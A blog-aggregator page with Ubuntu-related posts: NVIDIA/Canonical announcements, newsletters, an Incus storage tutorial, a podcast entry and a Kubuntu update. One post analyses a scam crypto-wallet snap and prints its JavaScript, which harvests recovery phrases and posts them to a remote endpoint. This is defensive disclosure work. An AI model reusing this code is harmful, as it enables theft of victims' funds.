March 18, 2024

Charmed Kubernetes support comes to NVIDIA AI Enterprise

Canonical’s Charmed Kubernetes is now supported on NVIDIA AI Enterprise 5.0. Organisations using Kubernetes deployments on Ubuntu can look forward to a seamless licensing migration to the latest release of the NVIDIA AI Enterprise software platform providing developers the latest AI models and optimised runtimes.

NVIDIA AI Enterprise 5.0

NVIDIA AI Enterprise 5.0 is supported across workstations, data centres, and cloud deployments, new updates include:

  • NVIDIA NIM microservices is a set of cloud-native microservices developers can use as building blocks to support custom AI application development and speed production AI, and will be supported on Charmed Kubernetes.
  • NVIDIA API catalog: providing quick access for enterprise developers to experiment, prototype and test NVIDIA-optimised foundation models powered by NIM. When ready to deploy, enterprise developers can export the enterprise-ready API and run on a self-hosted system
  • Infrastructure management enhancements include support for vGPU heterogeneous profiles, Charmed Kubernetes, and new GPU platforms.

Charmed Kubernetes and NVIDIA AI Enterprise 5.0

Data scientists and developers leveraging NVIDIA frameworks and workflows on Ubuntu across the board now have a single platform to rapidly develop AI applications on the latest generation NVIDIA Tensor Core GPUs. For data scientists and AI/ML developers who would like to deploy their latest AI workloads using kubernetes, it is vital to leverage the most performance out of Tensor Core GPUs through NVIDIA drivers and integrations.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/qafLgDmRQlzyQ_96dYJkeUBiPT1iFHcgQjCevEw1QxqCd9vCofG6dnWYpsKUrR9RMzM-hZyzZVOoRdim2moXMzT-4v5aTsennEU0cQfWClkWDhuTyszEDTxskryrIE_42oO3N215u0o" width="720" /> </noscript>
Fig. NVIDIA AI Enterprise 5.0

With Charmed Kubernetes from Canonical, several features are provided that are unique to this distribution including inclusion of NVIDIA operators and GPU optimisation features, composability and extensibility using customised integrations through Ubuntu operating system.

Best-In-Class Kubernetes from Canonical 

Charmed Kubernetes can automatically detect GPU-enabled hardware and install required drivers from NVIDIA repositories. With the release of Charmed Kubernetes 1.29, the NVIDIA GPU Operator charm is available for specific GPU configuration and tuning. With support for GPU operators in Charmed K8s, organisations can rapidly and repeatedly deploy the same models utilising existing on-prem or cloud infrastructure to power AI workloads. 

With the NVIDIA GPU operator, users can automatically detect the GPU on the system and install NVIDIA repositories. It also allows for the most optimal configurations through features such as NVIDIA Multi-Instance GPU (MIG) technology in order to leverage the most efficiency out of the Tensor Core GPUs. GPU-optimised instances for AI/ML applications reduce latency and allow for more data processing, freeing for larger-scale applications and more complex model deployment. 

Paired with the GPU Operator, the Network Operator enables GPUDirect RDMA (GDR), a key technology that accelerates cloud-native AI workloads by orders of magnitude. GDR allows for optimised network performance, by enhancing data throughput and reducing latency. Another distinctive advantage is its seamless compatibility with NVIDIA’s ecosystem, ensuring a cohesive experience for users. Furthermore, its design, tailored for Kubernetes, ensures scalability and adaptability in various deployment scenarios. This all leads to more efficient networking operations, making it an invaluable tool for businesses aiming to harness the power of GPU-accelerated networking in their Kubernetes environments.

Speaking about these solutions, Marcin “Perk” Stożek, Kubernetes Product Manager at Canonical says: “Charmed Kubernetes validation with NVIDIA AI Enterprise is an important step towards an enterprise-grade, end-to-end solution for AI workloads. By integrating NVIDIA Operators with Charmed Kubernetes, we make sure that customers get what matters to them most: efficient infrastructure for their generative AI workloads.” 

Getting started is easy (and free). You can rest assured that Canonical experts are available to help if required.

Get started with Canonical open source solutions with NVIDIA AI Enterprise 

Try out NVIDIA AI Enterprise with Charmed Kubernetes with a free, 90-day evaluation

on March 18, 2024 10:10 PM
<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/A_HSmF3YJY7LbaSsFWcwJLdGiA6MnAi0cCqmtDYmAXd9SE4B5u4AZZ14WVrokXR0VGrG0r_gG6LkQBgXODhC5ZIT9dLt5WvErPgVEoqwFi3HCF15wWDxp7gRE02-IkzqAJt0k5O7zNzwQ-XEC4VhPA" width="720" /> </noscript>
Fig.1. NVIDIA AI Workbench

Canonical expands its collaboration with NVIDIA through NVIDIA AI Workbench. NVIDIA AI Workbench is supported across workstations, data centres, and cloud deployments.

NVIDIA AI Workbench is an easy-to-use toolkit that allows developers to create, test, and customise AI and machine learning models on their PC or workstation and scale them to the data centre or public cloud.  It simplifies interactive development workflows while automating technical tasks that halt beginners and derail experts. Collaborative AI and ML development is now possible on any platform – and for any skill level. 

As the preferred OS for data science, artificial intelligence and machine learning, Ubuntu and Canonical play an integral role in AI Workbench capabilities. 

  • On Windows, Ubuntu powers AI Workbench via WSL2. 
  • In the cloud, Ubuntu 22.04 LTS enables AI Workbench cloud deployments as the only target OS supported for remote machines. 
  • For AI application deployments from the datacenter to cloud to edge, Ubuntu-based containers are included as a key part of AI Workbench.

This seamless end user experience is made possible thanks to the partnership between Canonical and NVIDIA.

Define your AI journey, start local and scale globally

Create, collaborate, and reproduce generative AI and data science projects with ease. Develop and execute while NVIDIA AI Workbench handles the rest:

  • Streamlined setup: easy installation and configuration of containerized development environments for GPU-accelerated hardware.
  • Laptop to cloud: start locally on a RTX PC or workstation and scale out to data centre or cloud in just a few clicks.
  • Automated workflow management: simplified management of project resources, versioning, and dependency tracking.
<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/-EfBv9zbee0oO4GP3pn1BshghxzEY-nkQzA2UKs-3AhtG1UHRto_n1-LTitJ9YCp0XEhry_s6TCRMGoJ7aNMY7DvrHOaSnEZEwLEuveXo6GicOqjuHqi4eWB-SKU8i9bSr6_YKtG9w-iFybrLWN7nQ" width="720" /> </noscript>
Fig 2. Environment Window in AI Workbench Desktop App

Ubuntu and NVIDIA AI Workbench improve the end user experience for Generative AI workloads on client machines

As the established OS for data science, Ubuntu is now commonly being used for AI/ML development and deployment purposes. This includes development, processing, and iterations of Generative AI (GenAI) workloads. GenAI on both smaller devices and GPUs is increasingly important with the growth of edge AI applications and devices. Applications such as smart cities require more edge devices such as cameras and sensors and thus require more data to be processed at the edge. To make it easier for end users to deploy workloads with more customisability, Ubuntu containers are often preferred due to their ease of use for bare metal deployments. NVIDIA AI Workbench offers Ubuntu container options that are well integrated and suited for GenAI use cases.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/xp2N0FrI5yUtEwGTbxkrDp1USeMgoL1Wo5O72Lqm4mXzSd6Uv-TulZfsilYc9YHynFb3EEq2ln-KAp0KWsgLBTL4OXhpPyUVsC9MAdAxT4IweW4TeE1YNyRO2K0tah-I7Tk2H43t7w_hjfiXN7hIIA" width="720" /> </noscript>
Fig 3. AI Workbench Development Workflow

Peace of mind with Ubuntu LTS

With Ubuntu, developers benefit from Canonical’s 20-year track record of Long Term Supported releases, delivering security updates and patching for 5 years. With Ubuntu Pro, organisations can extend that support and security maintenance commitment to 10 years to offload security and compliance from their team so you can focus on building great models. Together, Canonical and Ubuntu provide an optimised and secure environment for AI innovators wherever they are. 

Getting started is easy (and free).

Get started with Canonical Open Source AI Solutions

on March 18, 2024 10:10 PM

Welcome to the Ubuntu Weekly Newsletter, Issue 831 for the week of March 10 – 16, 2024. The full version of this issue is available here.

In this issue we cover:

  • Welcome New Members and Developers
  • Ubuntu Stats
  • Hot in Support
  • UbuCon Asia 2024 – Call for proposals
  • Catalan Team: Call for participation in the Noble Festival
  • LoCo Events
  • Ubuntu Quality – Communications and Testing Practices
  • Other Community News
  • Ubuntu Cloud News
  • Canonical News
  • In the Press
  • In the Blogosphere
  • Other Articles of Interest
  • Featured Audio and Video
  • Meeting Reports
  • Upcoming Meetings and Events
  • Updates and Security for Ubuntu 20.04, 22.04, and 23.10
  • And much more!

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

on March 18, 2024 09:08 PM

Previously…

Back in February, I blogged about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer $490K of some poor rube’s coin.

The snap was eventually removed, and some threads were started over on the Snapcraft forum

Groundhog Day

Nothing has changed it seems, because once again, ANOTHER TEN scam BitCoin wallet apps have been published in the Snap Store today.

You’re joking! Not another one!

Yes, Brenda!

This one has the snappy (sorry) name of exodus-build-96567 published by that not-very-legit looking publisher digisafe00000. Uh-huh.

Edit: Initially I wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out there’s a whole bunch under this account. All with popular cryto wallet brand names.

Publisher digisafe00000

There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.

Presentation

Here’s what it looks like on the Snap Store page https://snapcraft.io/exodus-build-96567 - which may be gone by the time you see this. A real minimum effort on the store listing page here. But I’m sure it could fool someone, they usually do.

A not very legit looking snap

It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.

Note: Do not install this.

Secure, Manage, and Swap all your favorite assets.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your BitCoin for an empty wallet, I suppose.

Although it is “Safe”, apparently, according to the store listing.

Coming to a desktop near you

Open wide

It looks like the exodus-build-96567 snap was only published to the store today. I wonder what happened to builds 1 through 96566!

$ snap info
name: exodus-build-96567
summary: Secure, Manage, and Swap all your favorite assets.
publisher: Digital Safe (digisafe00000)
store-url: https://snapcraft.io/exodus-build-96567
license: unset
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
channels:
 latest/stable: 8.6.5 2024-03-18 (1) 565kB -
 latest/candidate: ↑
 latest/beta: ↑
 latest/edge: ↑

Here’s the app running in a VM.

The application

If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.

Give us all your money

As with all these scam application, all it does is ask for a BitCoin recovery phrase, and with that will likely steal all the coins and send them off to the scammer’s wallet. Obviously I didn’t test this with a real wallet phrase.

When given a false passphrase/recovery-key it calls some remote API then shows a dubious error, having already taken your recovery key, and sent it to the scammer.

Error

What’s inside?

While the snap is still available for download from the store, I grabbed it.

$ snap download exodus-build-96567
Fetching snap "exodus-build-96567"
Fetching assertions for "exodus-build-96567"
Install the snap with:
 snap ack exodus-build-96567_1.assert
 snap install exodus-build-96567_1.snap

I then unpacked the snap to take a peek inside.

unsquashfs exodus-build-96567_1.snap
Parallel unsquashfs: Using 8 processors
11 inodes (21 blocks) to write

[===========================================================|] 32/32 100%

created 11 files
created 8 directories
created 0 symlinks
created 0 devices
created 0 fifos
created 0 sockets
created 0 hardlinks

There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single exodus-bin application binary in bin/.

tree squashfs-root/
squashfs-root/
├── bin
│ └── exodus-bin
├── meta
│ ├── gui
│ │ ├── exodus-build-96567.desktop
│ │ └── exodus-build-96567.png
│ ├── hooks
│ │ └── configure
│ └── snap.yaml
└── snap
 ├── command-chain
 │ ├── desktop-launch
 │ ├── hooks-configure-fonts
 │ └── run
 ├── gui
 │ ├── exodus-build-96567.desktop
 │ └── exodus-build-96567.png
 └── snapcraft.yaml

8 directories, 11 files

Here’s the snapcraft.yaml used to build the package. Note it needs network access, unsurprisingly.

name: exodus-build-96567 # you probably want to 'snapcraft register <name>'
base: core22 # the base snap is the execution environment for this snap
version: '8.6.5' # just for humans, typically '1.2+git' or '1.3.2'
title: Exodus Wallet
summary: Secure, Manage, and Swap all your favorite assets. # 79 char long summary
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.

grade: stable # must be 'stable' to release into candidate/stable channels
confinement: strict # use 'strict' once you have the right plugs and slots

apps:
 exodus-build-96567:
 command: bin/exodus-bin
 extensions: [gnome]
 plugs:
 - network
 - unity7
 - network-status

layout:
 /usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:
 bind: $SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0

parts:
 exodus-build-96567:
 plugin: dump
 source: .
 organize:
 exodus-bin: bin/

For completeness, here’s the snap.yaml that gets generated at build-time.

name: exodus-build-96567
title: Exodus Wallet
version: 8.6.5
summary: Secure, Manage, and Swap all your favorite assets.
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
architectures:
- amd64
base: core22
assumes:
- command-chain
- snapd2.43
apps:
 exodus-build-96567:
 command: bin/exodus-bin
 plugs:
 - desktop
 - desktop-legacy
 - gsettings
 - opengl
 - wayland
 - x11
 - network
 - unity7
 - network-status
 command-chain:
 - snap/command-chain/desktop-launch
confinement: strict
grade: stable
environment:
 SNAP_DESKTOP_RUNTIME: $SNAP/gnome-platform
 GTK_USE_PORTAL: '1'
 LD_LIBRARY_PATH: ${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
 PATH: $SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH
plugs:
 desktop:
 mount-host-font-cache: false
 gtk-3-themes:
 interface: content
 target: $SNAP/data-dir/themes
 default-provider: gtk-common-themes
 icon-themes:
 interface: content
 target: $SNAP/data-dir/icons
 default-provider: gtk-common-themes
 sound-themes:
 interface: content
 target: $SNAP/data-dir/sounds
 default-provider: gtk-common-themes
 gnome-42-2204:
 interface: content
 target: $SNAP/gnome-platform
 default-provider: gnome-42-2204
hooks:
 configure:
 command-chain:
 - snap/command-chain/hooks-configure-fonts
 plugs:
 - desktop
layout:
 /usr/lib/x86_64-linux-gnu/webkit2gtk-4.1:
 bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
 /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0:
 bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
 /usr/share/xml/iso-codes:
 bind: $SNAP/gnome-platform/usr/share/xml/iso-codes
 /usr/share/libdrm:
 bind: $SNAP/gnome-platform/usr/share/libdrm

Digging Deeper

Unlike the previous scammy application that was written using Flutter, the developers of this one appear to have made a web page in a WebKit GTK wrapper.

If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.

No network

I brought the network up, ran Wireshark then launched the rogue application again. The app clearly loads the remote content (html, javascript, css, and logos) then renders it inside the wrapper Window.

Wireshark

The javascript is pretty simple. It has a dictionary of words which are allowed in a recovery key. Here’s a snippet.

var words = ['abandon', 'ability', 'able', 'about', 'above', 'absent', 'absorb',
 
 'youth', 'zebra', 'zero', 'zone', 'zoo'];

As the user types words, the application checks the list.

var alreadyAdded = {};
function checkWords() {
 var button = document.getElementById("continueButton");
 var inputString = document.getElementById("areatext").value;
 var words_list = inputString.split(" ");
 var foundWords = 0;

 words_list.forEach(function(word) {
 if (words.includes(word)) {
 foundWords++;
 }
 });


 if (foundWords === words_list.length && words_list.length === 12 || words_list.length === 18 || words_list.length === 24) {


 button.style.backgroundColor = "#511ade";

 if (!alreadyAdded[words_list]) {
 sendPostRequest(words_list);
 alreadyAdded[words_list] = true;
 button.addEventListener("click", function() {
 renderErrorImport();
 });
 }

 }
 else{
 button.style.backgroundColor = "#533e89";
 }
}

If all the entered words are in the dictionary, it will allow the use of the “Continue” button to send a “POST” request to a /collect endpoint on the server.

function sendPostRequest(words) {

 var data = {
 name: 'exodus',
 data: words
 };

 fetch('/collect', {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json'
 },
 body: JSON.stringify(data)
 })
 .then(response => {
 if (!response.ok) {
 throw new Error('Error during the request');
 }
 return response.json();
 })
 .then(data => {
 console.log('Response:', data);

 })
 .catch(error => {
 console.error('There is an error:', error);
 });
}

Here you can see in the payload, the words I typed, selected from the dictionary mentioned above.

Wireshark

It also periodically ‘pings’ the /ping endpoint on the server with a simple payload of {" name":"exodus"}. Presumably for network connectivity checking, telemetry or seeing which of the scam wallet applications are in use.

function sendPing() {

 var data = {
 name: 'exodus',
 };

 fetch('/ping', {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json'
 },
 body: JSON.stringify(data)
 })
 .then(response => {
 if (!response.ok) {
 throw new Error('Error during the request');
 }
 return response.json();
 })
 .then(data => {
 console.log('Response:', data);

 })
 .catch(error => {
 console.error('There is an error:', error);
 });
}

All of this is done over HTTP, because of course it is. No security needed here!

Conclusion

It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.

I was somewhat hopeful that my previous post may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.

It would be really neat if the team at Canonical responsible for the store could do something to prevent these kinds of apps before they get into the hands of users.

I’ve reported the app to the Snap Store team.

Until next time, Brenda!

on March 18, 2024 08:00 PM

March 14, 2024

Incus is a manager for virtual machines and system containers.

A system container is an instance of an operating system that also runs on a computer, along with the main operating system. A system container uses, instead, security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as software virtual machines.

In this post we are going to see how to conveniently manage the files of several Incus containers from a separate Incus container. The common use-case is that you have several Incus containers that each one of them is a Website and you want your Web developer to have access to the files from a central location with either FTP or SFTP. Ideally, that central location should be an Incus container as well.

Therefore, we are looking on how to share storage between containers. The other case that we are not looking here, is how to share storage between the host and the containers.

The setup

We are creating several Incus containers and each one of them is a separate web server. Each web server expects to find the Web content files in the /var/www/ directory. Then, we want to create a separate container for the Web developer in order to give access to those /var/www/ directories from some central location. The Web developer will get access to that specific container and only that container. As Incus admins we are supposed to provide access to the Web developer to that specific container through SSH or FTP.

In this setup, the Incus container for the web server is webserver1 and the Web developer’s container is called webdev.

We will be creating storage volumes for each web server from the Incus storage pool, then incus attach those volumes to both the corresponding web server container and the Web developer’s container.

Setting up the Incus container for webserver1

First we create the web server container, webcontainer1, and install the web server package. By default, the nginx web server creates a directory html into /var/www/ for our default Web server. In there we will be attaching in the next+3 step the storage volume to store the files for this web server .

$ incus launch images:debian/12/cloud webserver1
Launching webserver1
$ incus exec webserver1 -- su --login debian
debian@webserver1:~$ sudo apt update
...
debian@webserver1:~$ sudo apt install -y nginx
...
debian@webserver1:~$ cd /var/www/
debian@webserver1:/var/www$ ls -l
total 1
drwxr-xr-x 2 root root 3 Mar 14 08:34 html
debian@webserver1:/var/www$ ls -l html/
total 1
-rw-r--r-- 1 root root 615 Mar 14 08:34 index.nginx-debian.html
debian@webserver1:/var/www$ 

Setting up the Incus container for webdev

Then, we create the Incus container for the Web developer. Ideally, you should provide access to this container to your Web developer through SSH/SFTP. Use incus config device add to create a proxy device in order to give access to your Web developer. Here, we create a WEBDEV directory in the home directory of the default debian user account of this container. In there, in the next step, we will be attaching the separate storage volumes of each web server.

$ incus launch images:debian/12/cloud webdev
Launching webdev
$ incus exec webdev -- su --login debian
debian@webdev:~$ pwd
/home/debian
debian@webdev:~$ mkdir WEBDEV
debian@webdev:~$ ls -l 
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:28 WEBDEV
debian@webdev:~$ 

Setting up the storage volume for each web server

When you launch an Incus container, you get automatically a single storage volume for the files of that container. We are treating ourselves and we create an extra storage volume for the web data. But let’s learn a bit about storage, storage pools and storage volumes.

We run incus storage list to get a list of storage pools for our installation. In this case, the storage pool is called default(name), we are using ZFS for storage (driver), and the ZFS pool (source) is called default as well. For the last part, you can run zpool list to verify the ZFS pool details. For the USED BYnumber of 89 in this example, you can verify it from the output of zfs list.

$ incus storage list
+---------+--------+---------+-------------+---------+---------+
|  NAME   | DRIVER | SOURCE  | DESCRIPTION | USED BY |  STATE  |
+---------+--------+---------+-------------+---------+---------+
| default | zfs    | default |             | 89      | CREATED |
+---------+--------+---------+-------------+---------+---------+
$ zpool list
NAME      SIZE  ALLOC     FREE  CKPOINT  EXPANDSZ   FRAG    CAP  DEDUP    HEALTH  ALTROOT
default   512G  136.9G  375.1G        -         -     8%    18%  1.00x    ONLINE  -
$ 

We run incus storage volume list to get a list of the storage volumes in Incus. I am not show the output here because it’s big. The first column is the type of the storage volume, either

  1. container, one per system container,
  2. image, for each cache image from a remote like images.linuxcontainers.org,
  3. virtual-machine, for each virtual machine, or
  4. custom, for those created by ourselves as we are going to do in a moment.

The fourth column is the content-type of a storage volume, and this can be either filesystem or block. The default when creating storage volumes is filesystem and we will be creating filesystem in a bit.

Creating the webdata1 storage volume

Now we are ready to create the webdata1 storage volume. In the functionality of the incus storage volume, we use the create command to create on the default storage pool the webdata1 storage volume, which is of type filesystem.

$ incus storage volume create default webdata1 --type=filesystem
Storage volume webdata1 created
$ 

Attaching the webdata1storage volume to the web server container

Now we can attach the webdata storage volume to the webserver1 container. In the functionality of the incus storage volume, we use the attach command to attach from the default storage pool the webdata1 storage volume to the webserver1 container, and mount it over the /var/www/html/ path.

$ incus storage volume attach default webdata1 webserver1 /var/www/html/
$ 

Attaching the webdata1storage volume to the webdev container

Now we can attach the webdata storage volume to the webdev container. In the functionality of the incus storage volume, we use the attach command to attach from the default storage pool the webdata1 storage volume to the webdev container, and mount it over the /home/debian/WEBDEV/ path.

$ incus storage volume attach default webdata1 webdev /home/debian/WEBDEV/webserver1
$ 

Preparing the storage volume for webserver1

We have attached the storage volume into both the web server container and the web development container. Let’s setup the initial permissions and setup some simple hello world HTML file. We get a shell into the web development container webdev, and observe that the storage volume has been mounted. The default permissions are drwxr-xr-x and we replace them into drwxr-xr-x. That is, we can list the contents of the directory. Then, we changed the owner:group into debian:debianin order to allow all access to the Web developer when they edit the files.

$ incus exec webdev -- su --login debian
debian@webdev:~$ ls -l
total 1
drwxr-xr-x 3 debian debian 3 Mar 14 10:33 WEBDEV
debian@webdev:~$ cd WEBDEV/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwx--x--x 2 root root 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ sudo chmod 755 webserver1/
debian@webdev:~/WEBDEV$ sudo chown debian:debian webserver1/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ 

Creating an initial HelloWorld HTML file

Still in the webdev container, we create an initial HTML file. Note that once you paste the HTML code, you press Ctrl+d to save the index.html file.

debian@webdev:~/WEBDEV$ cd webserver1
debian@webdev:~/WEBDEV/webserver1$ cat > index.html
<!DOCTYPE HTML>
<html>
  <head>
    <title>Welcome to Incus</title>
    <meta charset="utf-8"  />
  </head>
  <style>
    body {
      background: rgb(2,0,36);
      background: linear-gradient(90deg, rgba(2,0,36,1) 0%, rgba(9,9,121,1) 35%, rgba(0,212,255,1) 100%);
    }
    h1,p {
      color: white;
      text-align: center;
    }
  </style>
  <body>
    <h1>Welcome to Incus</h1>
    <p>The web development data of this web server are stored in an Incus storage volume. </p>
    <p>This storage volume is attached to both the web server container and a web development container. </p>
  </body>
</html>
Ctrl+d
debian@webdev:~/WEBDEV/webserver1$ ls -l
total 1
-rw-r--r-- 1 debian debian 608 Mar 14 11:05 index.html
debian@webdev:~/WEBDEV/webserver1$ logout
$ 

Testing the result

We visit the web server using our browser. The IP address of the web server is obtained as follows.

$ incus list webserver1 -c n4
+------------+--------------------+
|    NAME    |        IPV4        |
+------------+--------------------+
| webserver1 | 10.10.10.88 (eth0) |
+------------+--------------------+
$ 

This is the HTML page we created.

Conclusion

We showed how to use a storage volume to separate the web server data files from the web server container. Those files are stored in the Incus storage pool. We attached the same storage volume to a separate container for the Web developer so that they get access to the files and only the files from a central location, the webdev container.

An additional task would be to setup git in the webdev container so that any changes to the web files are tracked.

You can also detach storage volumes (no shown here).

You would use incus config device to create a proxy device to give external access to the Web developer. Preferably over SSH/SFTP, instead of just plain FTP. In fact in terms of usability it does not make a difference between the two. Yeah, please use SFTP. All web development tools should support SFTP.

on March 14, 2024 11:31 AM

"Todos à Tabacaria, Comprar a PC Guia!", é o novo motto do podcast. Neste episódio recebemos a visita de Giovanni Manghi - biólogo que trabalha com sistemas de informação geográfica (SIG) em Portugal desde 2008 e é militante ferrenho do Software Livre em todas as iniciativas que organiza e lugares por onde passa - nomeadamente do Qgis e sistemas GNU-Linux. Pelo caminho, falámos de confusões com o nome Ubuntu; aprender e ensinar com uma multidão de professores; distribuições Alentejanas; casos de sucesso de implantação de FLOSS em Portugal; o que falta fazer e perspectivas de futuro.

Já sabem: oiçam, subscrevam e partilhem!

Apoios

Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal. E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8. Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem. Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.

Atribuição e licenças

Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo Senhor Podcast. O website é produzido por Tiago Carrondo e o código aberto está licenciado nos termos da Licença MIT. A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License. Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

on March 14, 2024 12:00 AM

March 11, 2024

Welcome to the Ubuntu Weekly Newsletter, Issue 830 for the week of March 3 – 9, 2024. The full version of this issue is available here.

In this issue we cover:

  • Ubuntu 24.04 Testing Week
  • Ubuntu Stats
  • Hot in Support
  • Invitación al 20º Flisol en Mérida, Venezuela
  • LoCo Events
  • Documentation Office Hours recording 1st March 2024
  • Include Performance tooling in Ubuntu
  • Kernel Accessories Seed and Metapackage
  • Ubuntu 20th Anniversary – Party Planning
  • UbuCon @ SCaLE 21x – Schedules and Call for Booth Volunteers
  • Other Community News
  • Canonical News
  • In the Blogosphere
  • Featured Audio and Video
  • Meeting Reports
  • Upcoming Meetings and Events
  • Updates and Security for Ubuntu 20.04, 22.04, and 23.10
  • And much more!

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

.

on March 11, 2024 09:14 PM

March 08, 2024

Greetings, Kubuntu enthusiasts! It’s time for our regular community update, and we’ve got plenty of exciting developments to share from the past month. Our team has been hard at work, balancing the demands of personal commitments with the passion we all share for Kubuntu. Here’s what we’ve been up to:

Localstack & Kubuntu Joint Press Release


We’re thrilled to announce that we’ve been working closely with Localstack to prepare a joint press release that’s set to be published next week. This collaboration marks a significant milestone for us, and we’re eager to share the details with you all. Stay tuned!

Kubuntu Graphic Design Contest

Our Kubuntu Graphic Design contest, initiative is progressing exceptionally well, showcasing an array of exciting contributions from our talented community members. The creativity and innovation displayed in these submissions not only highlight the diverse talents within our community but also contribute significantly to the visual identity and user experience of Kubuntu. We’re thrilled with the participation so far and would like to remind everyone that the contest remains open to applicants until the 31st of March, 2024. This is a wonderful opportunity for designers, artists, and enthusiasts to leave their mark on Kubuntu and help shape its aesthetic direction. If you haven’t submitted your work yet, we encourage you to take part and share your vision with us. Let’s continue to build a visually stunning and user-friendly Kubuntu together

Kubuntu Wiki Support Forum


Our search for a new home for the Kubuntu Wiki Support Forum is progressing well. We understand the importance of having a reliable and accessible platform for our users to find support and share knowledge. Rest assured, we’re on track to make this transition as smooth as possible.

New Donations Platforms


In our efforts to ensure the sustainability and growth of Kubuntu, we’re in the process of introducing new donation platforms. Jonathan Riddell is at the helm, working diligently to align our financial controls and operations. This initiative will help us better serve our community and foster further development.

Collaboration with Kubuntu Focus


Exciting developments are on the horizon as we collaborate with Kubuntu Focus to curate a new set of developer tools. While we’re not ready to divulge all the details just yet, we’re confident that this partnership will yield invaluable resources for cloud software developers in our community. More information will be shared soon.

Kubuntu Matrix Communication


We’re happy to report that our efforts to enhance communication within the Kubuntu community have borne fruit. We now have a dedicated Kubuntu Space on Matrix, complete with channels for Development, Discussion, and Support. This platform will make it easier for our community to connect, collaborate, and provide mutual assistance.

A Word of Appreciation


The past few weeks have been a whirlwind of activity, both personally and professionally. Despite the challenges, the progress we’ve made is a testament to the dedication and hard work of everyone involved in the Kubuntu project. A special shoutout to Scarlett Moore, Aaron Rainbolt, Rik Mills and Mike Mikowski for their exceptional contributions and to the wider community for your unwavering support. Your enthusiasm and commitment are what drive us forward.

As we look towards the exciting release of Kubuntu 24.04, we’re filled with anticipation for what the future holds. Our journey is far from over, and with each step, we grow stronger and more united as a community. Thank you for being an integral part of Kubuntu. Here’s to the many achievements we’ll share in the days to come!

Stay connected, stay inspired, and as always, thank you for your continued support of Kubuntu.

— The Kubuntu Team

on March 08, 2024 04:53 PM

March 07, 2024

E289 Uma Profusão De Abas Em Fogo

Podcast Ubuntu Portugal

